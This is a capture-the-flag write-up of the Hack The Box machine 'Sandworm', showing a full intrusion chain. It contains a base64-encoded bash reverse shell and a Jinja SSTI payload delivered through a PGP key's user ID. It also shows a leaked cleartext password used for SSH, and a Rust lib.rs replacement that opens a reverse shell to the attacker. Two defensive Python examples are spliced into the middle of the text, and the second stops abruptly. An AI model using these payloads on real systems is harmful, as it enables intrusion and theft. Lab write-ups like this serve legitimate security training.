Hackthebox - Sandworm

admin | 2024-01-08 22:47:19 | 21 views | 42,609 characters | 142 min read

Box information

[Screenshot: Hackthebox - Sandworm]

Information gathering

Nmap

First, add a hosts entry:

echo 10.10.11.218 ssa.htb >> /etc/hosts
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sC -sV -A -p- --min-rate=10000 10.10.11.218
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-29 21:51 CST
Warning: 10.10.11.218 giving up on port because retransmission cap hit (10).
Nmap scan report for ssa.htb (10.10.11.218)
Host is up (0.40s latency).
Not shown: 64083 closed tcp ports (reset), 1449 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp  open  http     nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA
| Not valid before: 2023-05-04T18:03:25
|_Not valid after:  2050-09-19T18:03:25
|_http-server-header: nginx/1.18.0 (Ubuntu)
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), Linux 5.3 - 5.4 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   465.69 ms 10.10.16.1
2   320.25 ms ssa.htb (10.10.11.218)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.15 seconds

HTTP

[Screenshot: Hackthebox - Sandworm]

Just a single page with little on it, so let's fuzz for content.

Fuzz

┌──(root㉿kali)-[~/Desktop]
└─# ffuf -u 'https://ssa.htb/FUZZ' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

       v1.5.0 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : https://ssa.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

admin                   [Status: 302, Size: 227, Words: 18, Lines: 6, Duration: 1728ms]
contact                 [Status: 200, Size: 3543, Words: 772, Lines: 69, Duration: 1169ms]
login                   [Status: 200, Size: 4392, Words: 1374, Lines: 83, Duration: 1169ms]
logout                  [Status: 302, Size: 229, Words: 18, Lines: 6, Duration: 1174ms]
about                   [Status: 200, Size: 5584, Words: 1147, Lines: 77, Duration: 2395ms]
view                    [Status: 302, Size: 225, Words: 18, Lines: 6, Duration: 1556ms]
guide                   [Status: 200, Size: 9043, Words: 1771, Lines: 155, Duration: 1976ms]
process                 [Status: 405, Size: 153, Words: 16, Lines: 6, Duration: 1424ms]
                        [Status: 200, Size: 8161, Words: 2604, Lines: 124, Duration: 2046ms]
pgp                     [Status: 200, Size: 3187, Words: 9, Lines: 54, Duration: 1074ms]
:: Progress: [30000/30000] :: Job [1/1] :: 66 req/sec :: Duration: [0:17:33] :: Errors: 2 ::

Let's look around.

Login panel

[Screenshot: Hackthebox - Sandworm]

Visiting login, admin and view all redirect to the login page.

contact

[Screenshot: Hackthebox - Sandworm]

A page for submitting PGP content.

guide

[Screenshot: Hackthebox - Sandworm]

It lets us encrypt, decrypt or verify text with a PGP public key.

[Screenshot: Hackthebox - Sandworm]

At the very bottom there is a usable username: atlas.

PGP

[Screenshot: Hackthebox - Sandworm]

This is the site's PGP public key.

Exploitation

https://linuxhint.com/generate-pgp-keys-gpg/

After some searching, the method described at the link above can be used to generate a PGP key pair.

Creating a GPG key

┌──(root㉿kali)-[~/Desktop]
└─# gpg --gen-key
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

注意:使用 “gpg --full-generate-key” 以获得一个全功能的密钥生成对话框。

GnuPG 需要构建用户标识以辨认您的密钥。

真实姓名: Lucifiel
电子邮件地址: [email protected]
您选定了此用户标识:
    “Lucifiel <[email protected]>”

更改姓名(N)、注释(C)、电子邮件地址(E)或确定(O)/退出(Q)? o
我们需要生成大量的随机字节。在质数生成期间做些其他操作(敲打键盘
、移动鼠标、读写硬盘之类的)将会是一个不错的主意;这会让随机数
发生器有更好的机会获得足够的熵。
我们需要生成大量的随机字节。在质数生成期间做些其他操作(敲打键盘
、移动鼠标、读写硬盘之类的)将会是一个不错的主意;这会让随机数
发生器有更好的机会获得足够的熵。
gpg: /root/.gnupg/trustdb.gpg:建立了信任度数据库
gpg: 目录‘/root/.gnupg/openpgp-revocs.d’已创建
gpg: 吊销证书已被存储为‘/root/.gnupg/openpgp-revocs.d/99DC61F38F13D6BDB2736B258E229F58650BFB3E.rev’
公钥和私钥已经生成并被签名。

pub   rsa3072 2023-06-29 [SC] [有效至:2025-06-28]
      99DC61F38F13D6BDB2736B258E229F58650BFB3E
uid                      Lucifiel <[email protected]>
sub   rsa3072 2023-06-29 [E] [有效至:2025-06-28]

Export the public key

┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o public.key --export Lucifiel
┌──(root㉿kali)-[~/Desktop]
└─# cat public.key 
-----BEGIN PGP PUBLIC KEY BLOCK-----
-----END PGP PUBLIC KEY BLOCK-----

Export the private key

┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o private-file.key --export-secret-keys Lucifiel
┌──(root㉿kali)-[~/Desktop]
└─# cat private-file.key                                    
-----BEGIN PGP PRIVATE KEY BLOCK-----

-----END PGP PRIVATE KEY BLOCK-----

Create and verify a signature

┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign      
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

life-time
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

GPG verification

[Screenshot: Hackthebox - Sandworm]

Go to https://ssa.htb/guide and verify a message signed with our GPG key.

In the response, the name we entered when creating the GPG key, Lucifiel, is echoed back. I suspect SSTI here, so let's regenerate the key and try.

SSTI

https://www.sobyte.net/post/2021-12/modify-gpg-uid-name/

Found an article on modifying a GPG UID.

┌──(root㉿kali)-[~/Desktop]
└─# gpg --edit-key [email protected]
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

私钥可用。

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1). Lucifiel <[email protected]>

gpg> adduid
真实姓名: {{7*7}}
电子邮件地址: [email protected]
注释: 
您选定了此用户标识:
    “{{7*7}} <[email protected]>”

更改姓名(N)、注释(C)、电子邮件地址(E)或确定(O)/退出(Q)? o

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  Lucifiel <[email protected]>
[ 未知 ] (2). {{7*7}} <[email protected]>

A new UID has been created; now let's raise its trust level.

gpg> trust
sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  Lucifiel <[email protected]>
[ 未知 ] (2). {{7*7}} <[email protected]>

请决定您对这名用户能否正确地验证其他用户密钥
(通过查看护照,检查不同来源的的指纹等等)的相信程度

  1 = 我不知道或不作答
  2 = 我不相信
  3 = 我勉强相信
  4 = 我完全相信
  5 = 我绝对相信
  m = 回到主菜单

您的决定是什么? 5
您真的要把这个密钥设置成绝对信任?(y/N) y

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  Lucifiel <[email protected]>
[ 未知 ] (2). {{7*7}} <[email protected]>

gpg> uid 1

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)* Lucifiel <[email protected]>
[ 未知 ] (2). {{7*7}} <[email protected]>

gpg> deluid
真的要移除此用户标识吗?(y/N) y

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 未知 ] (1). {{7*7}} <[email protected]>

gpg> save

That does it.

Export the public key

┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o public.key --export {{7*7}}
┌──(root㉿kali)-[~/Desktop]
└─# cat public.key      
-----BEGIN PGP PUBLIC KEY BLOCK-----
-----END PGP PUBLIC KEY BLOCK-----

Export the private key

┌──(root㉿kali)-[~/Desktop]
└─# gpg -a -o private-file.key --export-secret-keys {{7*7}}
┌──(root㉿kali)-[~/Desktop]
└─# cat private-file.key 
-----BEGIN PGP PRIVATE KEY BLOCK-----
-----END PGP PRIVATE KEY BLOCK-----

Create and verify a signature

┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign 
┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign  
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

life-time
-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

[Screenshot: Hackthebox - Sandworm]

Here our {{7*7}} came back as 49, confirming that an SSTI vulnerability does exist.
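As an added defensive example (my code, not from the writeup or the box), this shows how a verification endpoint like /guide can shell out to gpg and display the signer without the user ID ever reaching the template engine: the result is parsed from gpg's machine-readable --status-fd lines, the UID is checked against an allow-list and HTML-escaped, and a UID carrying template syntax is withheld. The sample status lines and the function names are constructed for the demo; only the key id 8E229F58650BFB3E is taken from the writeup's test key.

```python
"""Hardened handling of gpg verification results (added example, not the box's code).

The Sandworm /guide page evidently built its template from the signer's user ID, which
is why a UID of {{7*7}} was rendered as 49. Here the UID is treated as data only: it is
parsed from gpg's --status-fd lines, checked against an allow-list, HTML-escaped and
inserted into a fixed template string. The status text below is constructed.
"""
import html
import re
import subprocess
from typing import Optional

# Constructed sample of `gpg --status-fd 1 --verify` output for a key whose only UID is
# an SSTI probe (key id reused from the writeup's test key, fingerprint likewise).
SAMPLE_STATUS = """\
[GNUPG:] NEWSIG
[GNUPG:] GOODSIG 8E229F58650BFB3E {{7*7}} <signer@example.invalid>
[GNUPG:] VALIDSIG 99DC61F38F13D6BDB2736B258E229F58650BFB3E 2023-06-29 1688054400 0 4 0 1 10 01 99DC61F38F13D6BDB2736B258E229F58650BFB3E
"""

GOODSIG_RE = re.compile(r"^\[GNUPG:\] GOODSIG (?P<keyid>[0-9A-F]{16}) (?P<uid>.+)$")
# What we are willing to echo back as a signer name: word characters, space and the
# punctuation normally found in an OpenPGP user ID. No braces, %, $ or backticks.
SAFE_UID_RE = re.compile(r"^[\w .,'@<>()+-]{1,128}$")
# Opening tokens of common template languages; one of these in a UID means a probe.
TEMPLATE_MARKERS = ("{{", "{%", "{#", "${", "<%", "#{")


def parse_status(status_text: str) -> Optional[dict]:
    """Extract {'keyid', 'uid', 'valid'} from status-fd lines; None when no GOODSIG seen."""
    sig = None
    valid = False
    for line in status_text.splitlines():
        m = GOODSIG_RE.match(line)
        if m:
            sig = {"keyid": m.group("keyid"), "uid": m.group("uid"), "valid": False}
        elif line.startswith("[GNUPG:] VALIDSIG "):
            valid = True
    if sig is not None:
        sig["valid"] = valid
    return sig


def looks_like_probe(uid: str) -> bool:
    """True if the UID contains template syntax worth alerting on."""
    return any(marker in uid for marker in TEMPLATE_MARKERS)


def render_result(sig: Optional[dict]) -> str:
    """HTML shown to the user. The template is a literal; the UID is escaped data."""
    if sig is None or not sig["valid"]:
        return "<p>Signature could not be verified.</p>"
    uid = sig["uid"]
    if looks_like_probe(uid) or not SAFE_UID_RE.match(uid):
        # Fail closed on display: the key id is ours to format, the UID is not.
        return (f"<p>Good signature from key {html.escape(sig['keyid'])} "
                f"(signer name withheld: not displayable).</p>")
    return f"<p>Good signature from {html.escape(uid)}.</p>"


def verify_with_gpg(signed_message: bytes, keyring: str) -> Optional[dict]:
    """Run gpg non-interactively against a dedicated keyring and parse its status lines."""
    proc = subprocess.run(
        ["gpg", "--batch", "--no-tty", "--no-default-keyring", "--keyring", keyring,
         "--status-fd", "1", "--verify"],
        input=signed_message, capture_output=True, check=False,
    )
    return parse_status(proc.stdout.decode("utf-8", "replace"))
```

Logging the withheld UID together with the key id gives the SOC a clean detection signal for template probes arriving through the PGP channel.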

Reverse shell

┌──(root㉿kali)-[~/Desktop]
└─# echo "bash -i >& /dev/tcp/10.10.16.48/4444 0>&1"|base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK

First we base64-encode the reverse shell command.

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }}

Then we build our reverse shell payload.

┌──(root㉿kali)-[~/Desktop]
└─# gpg --edit-key [email protected]
gpg (GnuPG) 2.2.40; Copyright (C) 2022 g10 Code GmbH
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

私钥可用。

gpg: 正在检查信任度数据库
gpg: marginals needed: 3  completes needed: 1  trust model: pgp
gpg: 深度:0  有效性:  1  已签名:  0  信任度:0-,0q,0n,0m,0f,1u
gpg: 下次信任度数据库检查将于 2025-06-28 进行
sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1). {{7*7}} <[email protected]>

gpg> adduid
真实姓名: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }}
电子邮件地址: [email protected]
注释: 
您选定了此用户标识:
    “{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>”

更改姓名(N)、注释(C)、电子邮件地址(E)或确定(O)/退出(Q)? o

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  {{7*7}} <[email protected]>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>
gpg> trust
sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  {{7*7}} <[email protected]>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>

请决定您对这名用户能否正确地验证其他用户密钥
(通过查看护照,检查不同来源的的指纹等等)的相信程度

  1 = 我不知道或不作答
  2 = 我不相信
  3 = 我勉强相信
  4 = 我完全相信
  5 = 我绝对相信
  m = 回到主菜单

您的决定是什么? 5
您真的要把这个密钥设置成绝对信任?(y/N) y

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)  {{7*7}} <[email protected]>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>

gpg> uid 1

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 绝对 ] (1)* {{7*7}} <[email protected]>
[ 未知 ] (2). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>

gpg> deluid
真的要移除此用户标识吗?(y/N) y

sec  rsa3072/8E229F58650BFB3E
     创建于:2023-06-29  有效至:2025-06-28  可用于:SC  
     信任度:绝对        有效性:绝对
ssb  rsa3072/DA683892A79B6B19
     创建于:2023-06-29  有效至:2025-06-28  可用于:E   
[ 未知 ] (1). {{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi40OC80NDQ0IDA+JjEK" | base64 -d | bash').read() }} <[email protected]>

gpg> save

Export the public key

┌──(root㉿kali)-[~/Desktop]
└─# gpg --armor --export [email protected] > public.key
┌──(root㉿kali)-[~/Desktop]
└─# cat public.key      
-----BEGIN PGP PUBLIC KEY BLOCK-----
-----END PGP PUBLIC KEY BLOCK-----

Create and verify a signature

┌──(root㉿kali)-[~/Desktop]
└─# echo 'life-time'|gpg --clear-sign --out signed_message.key
┌──(root㉿kali)-[~/Desktop]
└─# cat signed_message.key 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

life-time
-----BEGIN PGP SIGNATURE-----

-----END PGP SIGNATURE-----

Listen on a port

nc -nvlp 4444
┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 4444 
listening on [any] 4444 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 55382
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
/usr/local/sbin/lesspipe: 1: dirname: not found
atlas@sandworm:/var/www/html/SSA$ whoami&&id^M

Pressing Enter directly produces ^M, so let's fix the pseudo-terminal problem:

Ctrl+Z (back to the local shell)
stty raw -echo; fg
export TERM=xterm
stty rows 51 cols 237
python3 -c "import pty;pty.spawn('/bin/bash')";

That resolves the problem.

atlas@sandworm:/var/www/html/SSA$ whoami
Could not find command-not-found database. Run 'sudo apt update' to populate it.
whoami: command not found
atlas@sandworm:/var/www/html/SSA$ id
uid=1000(atlas) gid=1000(atlas) groups=1000(atlas)
atlas@sandworm:/var/www/html/SSA$ ls
SSA
atlas@sandworm:/var/www/html/SSA$ cd SSA
atlas@sandworm:/var/www/html/SSA/SSA$ ls
app.py       models.py    src     submissions
__init__.py  __pycache__  static  templates

We have a shell, but this looks like it is inside a container, and there is no flag here.

Privilege escalation

silentobserver

atlas@sandworm:~$ ls -la
total 44
drwxr-xr-x 8 atlas  atlas   4096 Jun  7 13:44 .
drwxr-xr-x 4 nobody nogroup 4096 May  4 15:19 ..
lrwxrwxrwx 1 nobody nogroup    9 Nov 22  2022 .bash_history -> /dev/null
-rw-r--r-- 1 atlas  atlas    220 Nov 22  2022 .bash_logout
-rw-r--r-- 1 atlas  atlas   3771 Nov 22  2022 .bashrc
drwxrwxr-x 2 atlas  atlas   4096 Jun  6 08:49 .cache
drwxrwxr-x 3 atlas  atlas   4096 Feb  7 10:30 .cargo
drwxrwxr-x 4 atlas  atlas   4096 Jan 15 07:48 .config
drwx------ 4 atlas  atlas   4096 Jun 29 15:10 .gnupg
drwxrwxr-x 6 atlas  atlas   4096 Feb  6 10:33 .local
-rw-r--r-- 1 atlas  atlas    807 Nov 22  2022 .profile
drwx------ 2 atlas  atlas   4096 Feb  6 10:34 .ssh

There is a .config folder in the home directory.

atlas@sandworm:~/.config$ ls -la
total 12
drwxrwxr-x 4 atlas  atlas   4096 Jan 15 07:48 .
drwxr-xr-x 8 atlas  atlas   4096 Jun  7 13:44 ..
dr-------- 2 nobody nogroup   40 Jun 29 08:31 firejail
drwxrwxr-x 3 nobody atlas   4096 Jan 15 07:48 httpie

The .config directory contains firejail, confirming that we are in a sandbox.

atlas@sandworm:~/.config/httpie/sessions/localhost_5000$ ls -la
total 12
drwxrwx--- 2 nobody atlas 4096 May  4 17:30 .
drwxrwxr-x 3 nobody atlas 4096 Jan 15 07:48 ..
-rw-r--r-- 1 nobody atlas  611 May  4 17:26 admin.json
atlas@sandworm:~/.config/httpie/sessions/localhost_5000$ cat admin.json
{
    "__meta__": {
        "about": "HTTPie session file",
        "help": "https://httpie.io/docs#sessions",
        "httpie": "2.6.0"
    },
    "auth": {
        "password": "quietLiketheWind22",
        "type": null,
        "username": "silentobserver"
    },
    "cookies": {
        "session": {
            "expires": null,
            "path": "/",
            "secure": false,
            "value": "eyJfZmxhc2hlcyI6W3siIHQiOlsibWVzc2FnZSIsIkludmFsaWQgY3JlZGVudGlhbHMuIl19XX0.Y-I86w.JbELpZIwyATpR58qg1MGJsd6FkA"
        }
    },
    "headers": {
        "Accept": "application/json, */*;q=0.5"
    }
}

Finally, in /home/atlas/.config/httpie/sessions/localhost_5000/admin.json we find the password of user silentobserver: quietLiketheWind22

Username = silentobserver
Password = quietLiketheWind22
┌──(root㉿kali)-[~/Desktop]
└─# ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.0-73-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jun 29 03:21:56 PM UTC 2023

  System load:           0.0
  Usage of /:            89.6% of 11.65GB
  Memory usage:          22%
  Swap usage:            0%
  Processes:             215
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.218
  IPv6 address for eth0: dead:beef::250:56ff:feb9:e9e3

  => / is using 89.6% of 11.65GB
  => There is 1 zombie process.


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Jun 29 15:21:58 2023 from 10.10.16.48
silentobserver@sandworm:~$ whoami&&id
silentobserver
uid=1001(silentobserver) gid=1001(silentobserver) groups=1001(silentobserver)

We now have a shell as the user.

silentobserver@sandworm:~$ cat user.txt 
8a61464d123533ae2536d7e54644b889

User flag obtained.

Root

2023/06/29 15:30:01 CMD: UID=0    PID=495842 | /bin/sh -c cd /opt/tipnet && /bin/echo "e" | /bin/sudo -u atlas /usr/bin/cargo run --offline

Running pspy, we see root running the Rust project tipnet (cargo run) in the context of user atlas.

tipnet

silentobserver@sandworm:/opt/tipnet/target/debug$ ./tipnet 
                                                     


Select mode of usage:
a) Upstream 
b) Regular (WIP)
c) Emperor (WIP)
d) SQUARE (WIP)
e) Refresh Indeces

logger

silentobserver@sandworm:/opt/crates/logger/src$ cat lib.rs 
extern crate chrono;

use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;

pub fn log(user: &str, query: &str, justification: &str) {
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);

    let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };

    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
}

We need to replace lib.rs with our own content.

//Just put the below code in lib.rs

extern crate chrono;

use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};

pub fn log(user: &str, query: &str, justification: &str) {
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!("[{}] - User: {}, Query: {}, Justification: {}\n", timestamp, user, query, justification);

    let mut file = match OpenOptions::new().append(true).create(true).open("/opt/tipnet/access.log") {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };

    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
    let sock = TcpStream::connect("10.10.16.48:4444").unwrap();

    // a tcp socket as a raw file descriptor
    // a file descriptor is the number that uniquely identifies an open file in a computer's operating system
    // When a program asks to open a file/other resource (network socket, etc.) the kernel:
    //     1. Grants access
    //     2. Creates an entry in the global file table
    //     3. Provides the software with the location of that entry (file descriptor)
    // https://www.computerhope.com/jargon/f/file-descriptor.htm
    let fd = sock.as_raw_fd();
    // so basically, writing to a tcp socket is just like writing something to a file!
    // the main difference being that there is a client over the network reading the file at the same time!

    Command::new("/bin/bash")
        .arg("-i")
        .stdin(unsafe { Stdio::from_raw_fd(fd) })
        .stdout(unsafe { Stdio::from_raw_fd(fd) })
        .stderr(unsafe { Stdio::from_raw_fd(fd) })
        .spawn()
        .unwrap()
        .wait()
        .unwrap();
}
silentobserver@sandworm:/opt/crates/logger/src$ rm lib.rs 
silentobserver@sandworm:/opt/crates/logger/src$ wget http://10.10.16.48/lib.rs
--2023-06-29 15:38:52--  http://10.10.16.48/lib.rs
Connecting to 10.10.16.48:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1921 (1.9K) [application/rls-services+xml]
Saving to: ‘lib.rs’

lib.rs                                               100%[======================================>]   1.88K  --.-KB/s    in 0.1s    

2023-06-29 15:38:53 (17.3 KB/s) - ‘lib.rs’ saved [1921/1921]

Then listen on a port with nc.

nc -nvlp 4444

Then just wait for the callback.

┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 36026
bash: cannot set terminal process group (496122): Inappropriate ioctl for device
bash: no job control in this shell
atlas@sandworm:/opt/tipnet$

This reverse shell has an extra jailer privilege that the first one lacked; run find to look for places to escalate.
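As an added defensive check (my code, not from the box), this audits a Cargo project the way the Sandworm cron job should have been audited: it reads the path dependencies out of Cargo.toml and reports any crate directory or source file that someone other than the trusted owner could modify, since cargo compiles whatever it finds there and the result runs as the build user. The demo project tree, its file modes and the helper names are constructed; the real paths on the box were /opt/tipnet and /opt/crates/logger.

```python
"""Audit a Cargo project's path dependencies for files a less-trusted user can change.

Added example, not the box's code. On Sandworm, root's cron job ran `cargo run` in
/opt/tipnet, which compiled the `logger` crate from /opt/crates/logger, a directory
silentobserver could write to. Whatever cargo compiles runs as the build user, so path
dependencies need the same ownership discipline as the binary. The demo tree built by
build_demo() and its file modes are constructed; the helper names are ours.
"""
import os
import re
import stat
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
# `logger = { path = "/opt/crates/logger" }` inside a [dependencies] table
INLINE_DEP_RE = re.compile(
    r'^\s*(?P<dep>[A-Za-z0-9_-]+)\s*=\s*\{[^}]*\bpath\s*=\s*"(?P<path>[^"]+)"')
# `path = "..."` inside a [dependencies.<name>] table
KEY_PATH_RE = re.compile(r'^\s*path\s*=\s*"(?P<path>[^"]+)"')
DEP_TABLES = ("dependencies", "build-dependencies", "dev-dependencies")


def path_dependencies(cargo_toml: Path) -> Dict[str, Path]:
    """Return {dependency name: absolute crate directory} for every path dependency."""
    deps: Dict[str, Path] = {}
    section = ""
    for line in cargo_toml.read_text().splitlines():
        m = SECTION_RE.match(line)
        if m:
            section = m.group("name").strip()
            continue
        table, _, dep_name = section.partition(".")
        if table not in DEP_TABLES:
            continue
        if dep_name:                       # [dependencies.logger] form
            m = KEY_PATH_RE.match(line)
            if m:
                deps[dep_name] = (cargo_toml.parent / m.group("path")).resolve()
        else:                              # logger = { path = "..." } form
            m = INLINE_DEP_RE.match(line)
            if m:
                deps[m.group("dep")] = (cargo_toml.parent / m.group("path")).resolve()
    return deps


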